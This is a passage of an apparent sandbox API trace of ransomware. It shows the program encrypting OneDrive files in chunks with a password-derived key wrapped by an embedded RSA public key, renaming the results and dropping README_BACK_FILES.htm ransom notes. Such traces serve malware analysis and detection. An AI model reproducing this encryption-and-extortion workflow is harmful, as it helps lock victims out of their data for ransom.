Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.079] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.079] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.079] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.079] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.080] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.080] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.080] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.080] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.080] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.081] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.081] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.081] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.081] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.081] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.081] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.081] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.081] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.081] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.081] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.081] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.081] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.081] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.082] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.082] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.082] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.082] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5f5f8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0279.082] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x2f5f5f8*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0279.082] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5f5f8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f5f8*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0279.082] CloseHandle (hObject=0x5d48) returned 1 [0279.082] CloseHandle (hObject=0x5d3c) returned 1 [0279.082] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0279.090] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0279.090] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0279.092] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0279.094] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0279.094] CryptDestroyKey (hKey=0x2fb688) returned 1 [0279.094] CryptReleaseContext (hProv=0x2f2da40, dwFlags=0x0) returned 1 [0279.094] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0279.095] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0279.095] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\readme_back_files.htm")) returned 0xffffffff [0279.095] AreFileApisANSI () returned 1 [0279.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889418, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0279.095] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\kk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\kk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0279.097] GetFileType (hFile=0x5d4c) returned 0x1 [0279.097] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0279.098] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0279.098] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0279.099] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.099] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0279.099] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0279.099] GetLastError () returned 0x0 [0279.099] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\filesync.localizedresources.dll.mui")) returned 0x20 [0279.099] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0279.100] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0279.102] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\km-kh\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0279.104] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\km-kh\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0279.105] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2d138) returned 1 [0279.108] CryptCreateHash (in: hProv=0x2f2d138, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0279.108] lstrlenA (lpString="gkdJXzAzHsZgjyaYXoQmaXsDzMlQm") returned 29 [0279.108] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0279.108] CryptDeriveKey (in: hProv=0x2f2d138, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0279.108] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0279.108] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0279.108] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d820) returned 1 [0279.109] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d820, dwCertEncodingType=0x1, pInfo=0x2f36d50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36d80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36d88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbc88) returned 1 [0279.109] CryptEncrypt (in: hKey=0x2fbc88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0279.109] CryptEncrypt (in: hKey=0x2fbc88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2dbd8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2dbd8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0279.109] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2dbd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2dbd8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0279.110] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.112] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.112] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.126] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.127] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.127] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.127] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.128] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.128] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.128] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.128] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.128] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.128] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.129] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.129] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.129] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.129] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, 